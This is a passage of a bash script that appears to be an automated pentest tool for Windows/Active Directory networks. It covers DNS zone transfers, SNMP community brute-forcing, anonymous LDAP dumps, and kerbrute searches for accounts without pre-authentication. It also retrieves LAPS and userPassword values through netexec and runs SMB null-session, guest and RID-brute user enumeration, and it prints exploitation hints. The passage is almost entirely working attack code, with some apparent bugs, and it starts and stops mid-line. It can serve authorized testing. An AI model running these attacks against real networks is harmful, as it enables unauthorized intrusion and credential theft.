for credentials into default file) -> ${DIR_PORTS}/vnc.txt" 833 | VNC=$(cat ${DIR_PORTS}/vnc.txt 2>/dev/null) 834 | fi 835 | } 836 | 837 | # < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_impersonate 2>/dev/null 838 | ###################### DNS ZONE TRANSFER ########################## 839 | zt () { 840 | if [[ -s "{${ROOT_PATH}}/hostname_file.txt" && -s "${DIR_PORTS}/53.txt" ]]; then 841 | log "[🔍] Trying zone transfer" 842 | DNSPATH=${ROOT_PATH}/ZoneTransfertDNS 843 | domain=$(head -n 1 ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}' | cut -d '.' -f 2-) 844 | NS=$(${proxychains} host -T -t ns $domain | awk -F"name server" '{print$2}') 845 | NS_cleaned=$(echo "$NS" | while read -r line; do echo "${line:0: -1}"; done) 846 | mkdir $DNSPATH 2>/dev/null 847 | for name_server in $NS_cleaned; 848 | do 849 | ${proxychains} host -T -t axfr $domain $name_server > $DNSPATH/$name_server.txt 2>/dev/null 850 | if [[ -s "$DNSPATH/$name_server.txt" && $(grep -qE "; Transfer failed.|timed out" "$DNSPATH/$name_server.txt"; echo $?) -ne 0 ]]; then 851 | green_log "${SPACE}[💀] Zone transfer performed successfully for $name_server ! -> $DNSPATH/$name_server.txt" 852 | blue_log "${SPACE} [+] ${proxychains} host -T -t axfr $domain $name_server" 853 | fi 854 | done 855 | fi 856 | } 857 | 858 | # ########################### Printer Recon ############################### 859 | printers () { 860 | log "[🔍] Printer Scan using SNMP Protocol Started" 861 | 862 | #pret is a python script that discover printers via snmp broadcast, so we have to determine if a network in on a target 863 | 864 | MY_IP=$(ip -o -4 addr show $INTERFACE | awk '{print $4}' | cut -d'/' -f1) 865 | MY_IP_WITH_MASK=$(ip -o -4 addr show $INTERFACE | awk '{print $4}' | cut -f1) 866 | # Calculer l'adresse réseau pour arp discovery 867 | NETWORK_LAN=$(ipcalc -n -b $MY_IP_WITH_MASK | grep "Address:" | awk '{print $2}') 868 | NETWORK_LAN_BROADCAST=$(ipcalc -n -b $MY_IP_WITH_MASK | grep "Broadcast:" | awk '{print $2}') 869 | 870 | rangeIP_array=$(echo "$rangeIP" | tr ',' '\n') 871 | for rangeIP_array_key in $rangeIP_array; do 872 | if echo $rangeIP_array_key | grep -vq "/32"; then 873 | TARGET_LAN=$(ipcalc -n -b $rangeIP_array_key | grep "Network:" | awk '{print $2}') 874 | TARGET_LAN_BROADCAST=$(ipcalc -n -b $rangeIP_array_key | grep "Broadcast:" | awk '{print $2}') 875 | else 876 | TARGET_LAN=$(ipcalc -n -b $rangeIP_array_key | grep "Address:" | awk '{print $2}') 877 | TARGET_LAN_BROADCAST=$TARGET_LAN 878 | fi 879 | 880 | # Convert IP addresses to integers for comparison 881 | ip_to_int() { 882 | local a b c d 883 | IFS=. read -r a b c d <<< "$1" 884 | echo $((a * 256**3 + b * 256**2 + c * 256 + d)) 885 | } 886 | network_start=$(ip_to_int "$NETWORK_LAN") 887 | network_end=$(ip_to_int "$NETWORK_LAN_BROADCAST") 888 | target_start=$(ip_to_int "$TARGET_LAN") 889 | target_end=$(ip_to_int "$TARGET_LAN_BROADCAST") 890 | 891 | #If attack range is into the selected network interface 892 | if [[ $network_start -le $target_start && $network_end -ge $target_end ]]; then 893 | if which pret > /dev/null 2>&1; then 894 | pret >> ${ROOT_PATH}/PrinterScan.txt 2>>/dev/null 895 | if grep -qi "Device" ${ROOT_PATH}/PrinterScan.txt ;then 896 | green_log "${SPACE}[!] Printers found ! Please combine these findings with the nmap web interface scan for printers -> ${ROOT_PATH}/PrinterScan.txt" 897 | fi 898 | else 899 | log "${SPACE}[!] Impossible to find the 'pret' tool." 900 | fi 901 | fi 902 | done 903 | } 904 | 905 | # ########################### SNMP ############################### 906 | snmp () { 907 | if [[ -e "${DIR_PORTS}/161.txt" ]] || [[ -e "${DIR_PORTS}/162.txt" ]] || [[ -e "${DIR_PORTS}/1061.txt" ]] || [[ -e "${DIR_PORTS}/1062.txt" ]]; then 908 | log "[🔍] Checking SNMP communities" 909 | if [ -z "${proxychains}" ]; then 910 | #merge of files 911 | for file in ${DIR_PORTS}/161.txt ${DIR_PORTS}/162.txt ${DIR_PORTS}/1061.txt ${DIR_PORTS}/1062.txt; do 912 | cat "${file}" 2>/dev/null >> "${DIR_PORTS}/snmp.txt" 913 | done 914 | sort -u "${DIR_PORTS}/snmp.txt" -o "${DIR_PORTS}/snmp.txt" 915 | 916 | onesixtyone -c "/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt" -i "${DIR_PORTS}/snmp.txt" -o "${ROOT_PATH}/communities.txt" -w 100 -q 917 | sort -u "${ROOT_PATH}/communities.txt" -o "${ROOT_PATH}/communities.txt" 918 | for ip in $(cat ${DIR_PORTS}/snmp.txt); do 919 | if control_ip_attack; then 920 | if grep -q "${ip}" "${ROOT_PATH}/communities.txt"; then 921 | hostname=$(grep -E "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 922 | COMMUNITY=$(grep "${ip}" "${ROOT_PATH}/communities.txt" | awk -F'[][]' '{print $2}') 923 | for COMMUNITY_KEY in $COMMUNITY; do 924 | green_log "${SPACE}[💀] SNMP v1 in ${COMMUNITY_KEY} community found on ${ip} (${hostname}) : ${ROOT_PATH}/communities.txt" 925 | done 926 | fi 927 | 928 | result_v2c="" 929 | result_v2c=$(timeout $SNMP_TIMEOUT snmpwalk -v 2c -c public ${ip} ) 930 | if [[ -n "$result_v2c" ]]; then 931 | green_log "${SPACE}[💀] SNMP v2c in PUBLIC community found on ${ip} (${hostname}) : ${DIR_VULNS}/SNMP-Public_v2c.txt" 932 | echo "$result_v2c" >> "${DIR_VULNS}/SNMP-Public_v2c.txt" 933 | fi 934 | fi 935 | done 936 | else 937 | log "${SPACE}${SPACE} [!]] Unable to perfom SMNP communities check with proxychains (only support TCP packets)" 938 | fi 939 | fi 940 | } 941 | 942 | # ########################### LDAP ############################### 943 | ldap () { 944 | ### ANONYMOUS LDAP ### 945 | if [[ -e "${DIR_PORTS}/389.txt" ]]; then 946 | mkdir ${DIR_VULNS}/ldap 2>/dev/null 947 | log "[🔍] Checking anonymous LDAP" 948 | #Extract the IPs of machines with port 389 open 949 | ip_389=$(cat "${DIR_PORTS}/389.txt" 2>/dev/null) 950 | #extraction of the FQDN and IP names of machines with port 389 open 951 | for ip_389_key in ${ip}_389; do 952 | grep ${ip}_389_key ${ROOT_PATH}/hostname_file.txt >> ${ROOT_PATH}/IP_FQDN_ldap.txt 953 | done 954 | sort -u ${ROOT_PATH}/IP_FQDN_ldap.txt -o ${ROOT_PATH}/IP_FQDN_ldap.txt 955 | #Extraction of one line (ip + hostname) from the LDAP server (AD) for each domain/sub-domain. The aim is not to carry out the attack on 3 DCs in the same domain 956 | awk -F ':' '{ split($2, parts, "."); domain = parts[2] "." parts[3] "." parts[4] "." parts[5] "." parts[6]; if (!seen[domain]++) print $0;}' ${ROOT_PATH}/IP_FQDN_ldap.txt >> ${ROOT_PATH}/IP_FQDN_ldap_filtered.txt 957 | LDAP_ip=$(cat ${ROOT_PATH}/IP_FQDN_ldap_filtered.txt | cut -d':' -f1) 958 | LDAP_domain_old=() 959 | for ip in $LDAP_ip; do 960 | if control_ip_attack; then 961 | #Récupération du nom de domaine associé à l'IP 962 | LDAP_domain=$(grep -E ${ip} ${ROOT_PATH}/IP_FQDN_ldap_filtered.txt | cut -d':' -f2- |cut -d'.' -f2-) 963 | #If domain didn't pass yet 964 | if [[ ! " ${LDAP_domain_old[@]} " =~ " ${LDAP_domain} " ]]; then 965 | log "${SPACE}[📂] Checking domain ${LDAP_domain} (${ip}) ..." 966 | #Création de la base pour la requete ldapsearch 967 | base_ldap="DC=$(echo "$LDAP_domain" | sed 's/\./,DC=/g')" 968 | DC_Name=$(grep -E ${ip} ${ROOT_PATH}/IP_FQDN_ldap_filtered.txt | cut -d':' -f2-) 969 | #Adding $LDAP_domain in the LDAP_domain_old LDAP_domain_old 970 | LDAP_domain_old+=("$LDAP_domain") 971 | 972 | #Extraction des utilisateurs et groupes (CN) : Peu précis .. 973 | ${proxychains} ldapsearch -H ldap://${ip} -x -w '' -D '' -b "${base_ldap}" | grep 'dn: CN=' > ${DIR_VULNS}/ldap/ldap_anonymous_users_${ip}_${domain}.txt 2>/dev/null 974 | check_ldap=$(cat ${DIR_VULNS}/ldap/ldap_anonymous_users_${ip}_${domain}.txt | wc -l) 975 | 976 | if [[ "$check_ldap" -gt 0 ]]; then 977 | green_log "${SPACE}${SPACE}[💀] Anonymous LDAP possible -> ${DIR_VULNS}/ldap/ldap_anonymous_${ip}_${domain}.txt" 978 | 979 | #Aller plus loin en tentant d'extraire les noms d'utilisateurs : 980 | ${proxychains} ldapsearch -H ldap://${ip} -x -w '' -D '' -b "${base_ldap}" "objectclass=user" sAMAccountName | grep "sAMAccountName" | awk -F ": " '{print $2}'| grep -v "sAMAccountName" > ${DIR_VULNS}/ldap/ldap_anonymous_users_${ip}_${domain}.txt 2>/dev/null 981 | check_ldap=$(cat ${DIR_VULNS}/ldap/ldap_anonymous_users_${ip}_${domain}.txt | wc -l) 982 | 983 | if [[ "$check_ldap" -gt 0 ]]; then 984 | green_log "${SPACE}${SPACE}[💀] Users extracted -> ${DIR_VULNS}/ldap/ldap_anonymous_users_${ip}_${domain}.txt" 985 | fi 986 | 987 | #Retrieving the users account via kerbrute and trying to get no-preauth users 988 | ${proxychains} kerbrute userenum --dc $DC_Name -d $LDAP_domain ${DIR_VULNS}/ldap/ldap_anonymous_users_${ip}_${domain}.txt -t 50 --downgrade --hash-file ${DIR_VULNS}/ldap/ldap_anonymous_${ip}_${domain}_valid_users_no_preauth.txt > ${DIR_VULNS}/ldap/ldap_anonymous_${ip}_${domain}_valid_users.txt 2>/dev/null 989 | check_ldap=$(cat ${DIR_VULNS}/ldap/ldap_anonymous_${ip}_${domain}_valid_users.txt | grep 'krb5asrep' | wc -l) 990 | if [[ "$check_ldap" -gt 0 ]]; then 991 | green_log "${SPACE}${SPACE}[💀] Users without pre-auth found ! -> ${DIR_VULNS}/ldap/ldap_anonymous_${ip}_${domain}_valid_users_no_preauth.txt" 992 | fi 993 | cat ${DIR_VULNS}/ldap/ldap_anonymous_${ip}_${domain}_valid_users.txt | grep 'VALID' | awk -F "[:@]" '{print $4}'| sed 's/^[ \t]*//;s/[ \t]*$//' >> ${ROOT_PATH}/users.txt 994 | sort -u ${ROOT_PATH}/users.txt -o ${ROOT_PATH}/users.txt 995 | fi 996 | fi 997 | fi 998 | done 999 | 1000 | rm ${ROOT_PATH}/IP_FQDN_ldap.txt 1001 | rm ${ROOT_PATH}/IP_FQDN_ldap_filtered.txt 1002 | fi 1003 | 1004 | ### ENUMERATION LDAP ### 1005 | LDAP_Servers=$(cat ${ROOT_PATH}/ports/88.txt ${ROOT_PATH}/ports/389.txt 2>/dev/null | sort | uniq) 1006 | ldap_modules=(adcs laps get-userPassword get-unixUserPassword) 1007 | if [[ -n "$LDAP_Servers" ]] && [[ "${Username}" != "anonymous" ]]; then 1008 | log "[🔍] Enumeration via LDAP" 1009 | for module in ${ldap_modules[@]};do 1010 | for ip in $LDAP_Servers;do 1011 | if control_ip_attack; then 1012 | host=${ip} 1013 | ${proxychains} timeout ${CME_TIMEOUT} netexec ldap $host -u ${Username} ${cme_creds} -M ${module} < /dev/null > ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt 2>/dev/null 1014 | if grep -Eqo "STATUS_NOT_SUPPORTED|Failed to authenticate the user .* with ntlm" ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt;then 1015 | #If NTLM isn't supported, then use kerberos authentification 1016 | hostname=$(grep -E "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 1017 | if [[ -n "${hostname}" ]];then 1018 | kerberos="-d $(echo "${hostname}" | cut -d '.' -f 2-) --kerberos" 1019 | host="${hostname}" 1020 | else 1021 | kerberos="" 1022 | host="${ip}" 1023 | fi 1024 | ${proxychains} timeout ${CME_TIMEOUT} netexec ldap $host -u ${Username} ${cme_creds} ${kerberos} -M ${module} < /dev/null > ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt 2>/dev/null 1025 | fi 1026 | if [[ "${module}" == "laps" ]] && grep -Eqio "Password:" ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt;then 1027 | green_log "${SPACE}[💀] '${module}' password(s) found from ${username} account ! -> ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt" 1028 | elif [[ "${module}" == "adcs" ]] && grep -Eqio "FOUND PKI|Found CN" ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt;then 1029 | green_log "${SPACE}[💀] '${module}' server found ! -> ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt" 1030 | elif [[ "${module}" == "get-userPassword" ]] && grep -Eqio "GET-USER" ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt && ! grep -Eqio "No userPassword Found" ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt;then 1031 | green_log "${SPACE}[💀] Users Password found ! -> ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt" 1032 | elif [[ "${module}" == "get-unixUserPassword" ]] && grep -Eqio "GET-UNIX" ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt && ! grep -Eqio "No unixUserPassword Found" ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt;then 1033 | green_log "${SPACE}[💀] Unix Users Password found ! -> ${DIR_VULNS}/Enum_Device_${ip}_${module}.txt" 1034 | fi 1035 | fi 1036 | done 1037 | done 1038 | fi 1039 | } 1040 | 1041 | ipmi () { 1042 | if [[ -e "${DIR_PORTS}/623.txt" ]]; then 1043 | log "[🔍] Some IPMI ports detected ! -> ${DIR_PORTS}/623.txt" 1044 | fi 1045 | } 1046 | 1047 | mssql () { 1048 | if [[ -e "${DIR_PORTS}/1433.txt" ]] && [[ "${Username}" != "anonymous" ]]; then 1049 | mkdir ${DIR_VULNS}/mssql 2>/dev/null 1050 | log "[🔍] Checking MSSQL" 1051 | MSSQL=$(cat ${DIR_PORTS}/1433.txt) 1052 | for ip in $MSSQL; do 1053 | if control_ip_attack; then 1054 | log "${SPACE}[📂] Checking ${ip} (${hostname}) ..." 1055 | ${proxychains} netexec --timeout ${CME_TIMEOUT} mssql ${ip} -u ${Username} ${cme_creds} < /dev/null > ${DIR_VULNS}/mssql/cme_${ip}_basic 2>/dev/null 1056 | if grep -Eqo "STATUS_NOT_SUPPORTED" "${DIR_VULNS}/mssql/cme_${ip}_basic" || grep -Eqo "Failed to authenticate the user .* with ntlm" "${DIR_VULNS}/mssql/cme_${ip}_basic"; then 1057 | #If NTLM is not supported, restart with kerberos 1058 | hostname=$(grep -E "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 1059 | if [[ -n "${hostname}" ]];then 1060 | kerberos="-d $(echo "${hostname}" | cut -d '.' -f 2-) --kerberos" 1061 | host="${hostname}" 1062 | else 1063 | kerberos="" 1064 | host="${ip}" 1065 | fi 1066 | ${proxychains} netexec mssql $host -u "${Username}" ${cme_creds} ${kerberos} < /dev/null > ${DIR_VULNS}/mssql/cme_${ip}_basic 2>/dev/null 1067 | fi 1068 | # is user ? 1069 | if grep -aq '\[+\]' ${DIR_VULNS}/mssql/cme_${ip}_basic; then 1070 | green_log "${SPACE}${SPACE}[💀] ${Username} is a valid username ${ip} (${hostname})" 1071 | # is admin ? 1072 | if grep -aq '(Pwn3d!)' ${DIR_VULNS}/mssql/cme_${ip}_basic; then 1073 | red_log "${SPACE}${SPACE}[💀] ${Username} have admin rights on MSSQL DB ${ip} (${hostname}) !" 1074 | fi 1075 | #Can impersonate ? https://seguridadpy.info/2024/08/mssql-for-pentester-netexec/ 1076 | ${proxychains} netexec mssql $host -u "${Username}" ${cme_creds} ${kerberos} -M mssql_priv < /dev/null > ${DIR_VULNS}/mssql/cme_${ip}_mssql_priv 2>/dev/null 1077 | if grep -aq 'can impersonate' ${DIR_VULNS}/mssql/cme_${ip}_mssql_priv; then 1078 | red_log "${SPACE}${SPACE}[💀] ${Username} can impersonate user on MSSQL DB ${ip} (${hostname}) !" 1079 | blue_log "${SPACE}${SPACE} [+] ${proxychains} netexec mssql $host -u "${Username}" ${cme_creds} ${kerberos} -M mssql_priv -o ACTION=privesc / 'rollback' to reverse the impersonation" 1080 | fi 1081 | fi 1082 | fi 1083 | done 1084 | fi 1085 | } 1086 | 1087 | ########################### SCAN SMB ############################### 1088 | smb () { 1089 | if [[ -e "${DIR_PORTS}/445.txt" ]]; then 1090 | mkdir ${DIR_VULNS}/smb 2>/dev/null 1091 | log "[🔍] Check SMB" 1092 | SMB=$(cat ${DIR_PORTS}/445.txt) 1093 | for ip in $SMB; do 1094 | if control_ip_attack; then 1095 | hostname=$(grep -E "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 1096 | log "${SPACE}[📂] Checking ${ip} (${hostname}) ..." 1097 | 1098 | #Anonymous / null session is allowed ? 1099 | ${proxychains} netexec --timeout 30 smb ${ip} -u '' -p '' --shares > ${DIR_VULNS}/smb/cme_${ip}_null_session_shares 2>/dev/null 1100 | ${proxychains} netexec --timeout 30 smb ${ip} -u '' -p '' --users > ${DIR_VULNS}/smb/cme_${ip}_null_session_users 2>/dev/null 1101 | if (grep -aq '\[+\]' "${DIR_VULNS}/smb/cme_${ip}_null_session_shares" && ! grep -aq "STATUS_ACCESS_DENIED" "${DIR_VULNS}/smb/cme_${ip}_null_session_shares") || grep -aiq 'BadPW' "${DIR_VULNS}/smb/cme_${ip}_null_session_users"; then 1102 | green_log "${SPACE}${SPACE}[💀] Null session (anonymous) allowed" 1103 | if grep -qaE 'READ|WRITE' "${DIR_VULNS}/smb/cme_${ip}_null_session_shares"; then 1104 | green_log "${SPACE}${SPACE}[💀] Shares found -> ${DIR_VULNS}/smb/cme_${ip}_null_session_shares" 1105 | blue_log "${SPACE}${SPACE} [+] ${proxychains} smbmap -H ${ip} -r --depth 3 --exclude IPC$" 1106 | fi 1107 | 1108 | cat ${DIR_VULNS}/smb/cme_${ip}_null_session_rid_brute |grep -ai 'SidTypeUser' |grep -av '\[.\]' | grep -v "\-BadPW\-" | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | \ 1109 | sed 's/.*\\//' | awk '{print $1}' | tee -a ${DIR_VULNS}/smb/cme_${ip}_local_users.txt ${ROOT_PATH}/users.txt 1110 | if [[ $(wc -l < "${DIR_VULNS}/smb/cme_${ip}_local_users.txt") -gt 0 ]]; then 1111 | green_log "${SPACE}${SPACE}[💀] New local users found -> ${DIR_VULNS}/smb/cme_${ip}_local_users.txt AND ${ROOT_PATH}/users.txt" 1112 | fi 1113 | 1114 | cat ${DIR_VULNS}/smb/cme_${ip}_null_session_users |grep -av '\[.\]' | grep -v "\-BadPW\-" | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | \ 1115 | sed 's/.*\\//' |awk '{desc=""; for (i=4; i<=NF; i++) desc=desc " " $i; print $1 ":" desc}' | \ 1116 | awk '{desc=""; for (i=3; i<=NF; i++) desc=desc " " $i; if ($2 ~ /^[0-9]+$/) print $1 ":" desc; else print $1 ": " $2 desc}'| \ 1117 | column -t -s ':' | tee -a ${ROOT_PATH}/users_with_descriptions.txt ${DIR_VULNS}/smb/cme_${ip}_users.txt 1118 | cat ${DIR_VULNS}/smb/cme_${ip}_null_session_users |grep -av '\[.\]' | grep -v "\-BadPW\-" | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | \ 1119 | sed 's/.*\\//' | awk '{print $1}' >> ${ROOT_PATH}/users.txt 1120 | ## Supprimer les doublons 1121 | sort -u ${ROOT_PATH}/users.txt -o ${ROOT_PATH}/users.txt 1122 | sort -u ${ROOT_PATH}/users_with_descriptions.txt -o ${ROOT_PATH}/users_with_descriptions.txt 1123 | sort -u ${DIR_VULNS}/smb/cme_${ip}_users.txt -o ${DIR_VULNS}/smb/cme_${ip}_users.txt 1124 | check_smb=$(cat ${DIR_VULNS}/smb/cme_${ip}_null_session_users ${DIR_VULNS}/smb/cme_${ip}_null_session_rid_brute |grep -av '\[.\]' | grep -v "\-BadPW\-" | \ 1125 | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | sed 's/.*\\//' | awk '{print $1}' | wc -l) 1126 | if [[ "$check_smb" -gt 0 ]] && ! grep -iq "Exception" ${DIR_VULNS}/smb/cme_${ip}_null_session_users ${DIR_VULNS}/smb/cme_${ip}_null_session_rid_brute; then 1127 | green_log "${SPACE}${SPACE}[💀] New users found -> ${ROOT_PATH}/users_with_descriptions.txt AND ${ROOT_PATH}/users.txt" 1128 | fi 1129 | fi 1130 | # Guest session allowed ? 1131 | ${proxychains} netexec --timeout ${CME_TIMEOUT} smb ${ip} -u 'GuestUser' -p '' --shares < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_guest_shares 2>/dev/null 1132 | if grep -aq '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_guest_shares; then 1133 | green_log "${SPACE}${SPACE}[💀] Guest session allowed" 1134 | 1135 | if grep -qaE 'READ|WRITE' "${DIR_VULNS}/smb/cme_${ip}_guest_shares"; then 1136 | green_log "${SPACE}${SPACE}[💀] Shares found -> ${DIR_VULNS}/smb/cme_${ip}_guest_shares" 1137 | blue_log "${SPACE}${SPACE} [+] ${proxychains} smbmap -H ${ip} -p 'GuestUser' -p '' -r --depth 3 --exclude IPC$" 1138 | fi 1139 | 1140 | ${proxychains} netexec --timeout ${CME_TIMEOUT} smb ${ip} -u 'GuestUser' -p '' --rid-brute 2000 < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_guest_users_rid_brute 2>/dev/null 1141 | cat ${DIR_VULNS}/smb/cme_${ip}_guest_users_rid_brute |grep -ai 'SidTypeUser' |grep -av '\[.\]' | grep -v "\-BadPW\-" | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | \ 1142 | sed 's/.*\\//' | awk '{print $1}' | tee -a ${DIR_VULNS}/smb/cme_${ip}_users.txt ${ROOT_PATH}/users.txt 1143 | 1144 | ${proxychains} netexec --timeout ${CME_TIMEOUT} smb ${ip} -u 'GuestUser' -p '' --users < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_guest_users 2>/dev/null 1145 | cat ${DIR_VULNS}/smb/cme_${ip}_guest_users |grep -av '\[.\]' | grep -v "\-BadPW\-" | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | \ 1146 | sed 's/.*\\//' |awk '{desc=""; for (i=4; i<=NF; i++) desc=desc " " $i; print $1 ":" desc}' | \ 1147 | awk '{desc=""; for (i=3; i<=NF; i++) desc=desc " " $i; if ($2 ~ /^[0-9]+$/) print $1 ":" desc; else print $1 ": " $2 desc}'| \ 1148 | column -t -s ':' | tee -a ${ROOT_PATH}/users_with_descriptions.txt ${DIR_VULNS}/smb/cme_${ip}_users.txt 1149 | cat ${DIR_VULNS}/smb/cme_${ip}_guest_users |grep -av '\[.\]' | grep -v "\-BadPW\-" | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | \ 1150 | sed 's/.*\\//' | awk '{print $1}' >> ${ROOT_PATH}/users.txt 1151 | 1152 | ## Supprimer les doublons 1153 | sort -u ${ROOT_PATH}/users.txt -o ${ROOT_PATH}/users.txt 1154 | sort -u ${ROOT_PATH}/users_with_descriptions.txt -o ${ROOT_PATH}/users_with_descriptions.txt 1155 | sort -u ${DIR_VULNS}/smb/cme_${ip}_users.txt -o ${DIR_VULNS}/smb/cme_${ip}_users.txt 1156 | check_smb=$(cat ${DIR_VULNS}/smb/cme_${ip}_guest_users ${DIR_VULNS}/smb/cme_${ip}_guest_users_rid_brute |grep -av '\[.\]' | grep -v "\-BadPW\-" | \ 1157 | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | sed 's/.*\\//' | awk '{print $1}' | wc -l) 1158 | if [[ "$check_smb" -gt 0 ]] && ! grep -iq "Exception" ${DIR_VULNS}/smb/cme_${ip}_guest_users_rid_brute ${DIR_VULNS}/smb/cme_${ip}_guest_users; then 1159 | green_log "${SPACE}${SPACE}[💀] New users found -> ${DIR_VULNS}/smb/cme_${ip}_users.txt AND ${ROOT_PATH}/users.txt" 1160 | fi 1161 | fi 1162 | # Can i connect with input user ? 1163 | if [[ "${Username}" != "anonymous" ]]; then 1164 | ${proxychains} netexec --timeout ${CME_TIMEOUT} smb ${ip} -u ${Username} ${cme_creds} < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_basic_${Username} 2>/dev/null 1165 | if grep -Eqo "STATUS_NOT_SUPPORTED" "${DIR_VULNS}/smb/cme_${ip}_basic_${Username}" || grep -Eqo "Failed to authenticate the user .* with ntlm" "${DIR_VULNS}/smb/cme_${ip}_basic_${Username}"; then 1166 | #If NTLM is not supported, restart with kerberos 1167 | if [[ -n "${hostname}" ]];then 1168 | kerberos="-d $(echo "${hostname}" | cut -d '.' -f 2-) --kerberos" 1169 | host="${hostname}" 1170 | fi 1171 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_basic_${Username} 2>/dev/null 1172 | else 1173 | kerberos="" 1174 | host="${ip}" 1175 | fi 1176 | fi 1177 | #Can we connect to at least one share ? 1178 | if grep -aqs '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_basic_${Username} || grep -aqs '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_guest || grep -aqs 'SidTypeUser' ${DIR_VULNS}/smb/cme_${ip}_null_session; then 1179 | if [[ "${Username}" != "anonymous" ]]; then 1180 | green_log "${SPACE}${SPACE}[💀] ${Username} is a valid username" 1181 | fi 1182 | can_connect="1" 1183 | else 1184 | can_connect="0" 1185 | fi 1186 | #Are we machine's admin 1187 | if grep -aqs '(Pwn3d!)' ${DIR_VULNS}/smb/cme_${ip}_basic_${Username}; then 1188 | red_log "${SPACE}${SPACE}[💀] ${Username} have admin rights ! -> impacket-smbexec to exploit" 1189 | admin="1" 1190 | else 1191 | admin="0" 1192 | fi 1193 | 1194 | if [ "$can_connect" = "1" ]; then 1195 | #List available shares 1196 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} --shares < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_basic_share_${Username} 2>/dev/null 1197 | if grep -qaE 'READ|WRITE' "${DIR_VULNS}/smb/cme_${ip}_basic_share_${Username}"; then 1198 | green_log "${SPACE}${SPACE}[💀] Shares found -> ${DIR_VULNS}/smb/cme_${ip}_basic_share_${Username}" 1199 | if [[ -n "${Password}" ]]; then 1200 | blue_log "${SPACE}${SPACE} [+] ${proxychains} smbmap -H ${ip} -r --depth 3 -u '${Username}' -p '${Password}' --exclude IPC$" 1201 | elif [[ -n "$NT_Hash" ]]; then 1202 | blue_log "${SPACE}${SPACE} [+] ${proxychains} smbmap -H ${ip} -r --depth 3 -u '${Username}' -p 'aad3b435b51404eeaad3b435b51404ee:${NT_Hash}' --exclude IPC$" 1203 | fi 1204 | fi 1205 | 1206 | ###### RETRIEVE POLICY PASSWORD ###### 1207 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} --pass-pol < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_pass_pol 2>/dev/null 1208 | check_smb=$(grep -ao '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_pass_pol | wc -l) 1209 | if [ "$check_smb" -gt 1 ]; then 1210 | green_log "${SPACE}${SPACE}[💀] Password Policy found -> ${DIR_VULNS}/smb/cme_${ip}_pass_pol" 1211 | fi 1212 | 1213 | ###### RETRIEVE USERS ###### 1214 | #'< /dev/null' avoid netexec to break the loop, weird behavior .. 1215 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} --rid-brute 10000 < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_rid_brute 2>/dev/null 1216 | grep -i 'SidTypeUser' ${DIR_VULNS}/smb/cme_${ip}_rid_brute| grep -av '\[.\]' | awk -F'\\' '{print $2}' | cut -d " " -f 1 >> ${ROOT_PATH}/users.txt 1217 | sort -u ${ROOT_PATH}/users.txt -o ${ROOT_PATH}/users.txt 1218 | if grep -qs "SidTypeUser" ${DIR_VULNS}/smb/cme_${ip}_rid_brute; then 1219 | green_log "${SPACE}${SPACE}[💀] New users found (via RID_brute) -> ${DIR_VULNS}/smb/cme_${ip}_rid_brute" 1220 | ## Supprimer les doublons 1221 | sort -u ${ROOT_PATH}/users.txt -o ${ROOT_PATH}/users.txt 1222 | fi 1223 | ${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} --users < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_users 2>/dev/null 1224 | check_smb=$(cat ${DIR_VULNS}/smb/cme_${ip}_users | wc -l) 1225 | if [[ "$check_smb" -gt 4 ]]; then 1226 | green_log "${SPACE}${SPACE}[💀] New users found -> ${ROOT_PATH}/users_with_descriptions.txt AND ${ROOT_PATH}/users.txt" 1227 | 1228 | ## Injecter ces utilisateurs dans un fichier 1229 | cat ${DIR_VULNS}/smb/cme_${ip}_users |grep -av '\[.\]' | grep -v "\-BadPW\-" | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | \ 1230 | sed 's/.*\\//' |awk '{desc=""; for (i=4; i<=NF; i++) desc=desc " " $i; print $1 ":" desc}' | \ 1231 | awk '{desc=""; for (i=3; i<=NF; i++) desc=desc " " $i; if ($2 ~ /^[0-9]+$/) print $1 ":" desc; else print $1 ": " $2 desc}'| \ 1232 | column -t -s ':' >> ${ROOT_PATH}/users_with_descriptions.txt 1233 | cat 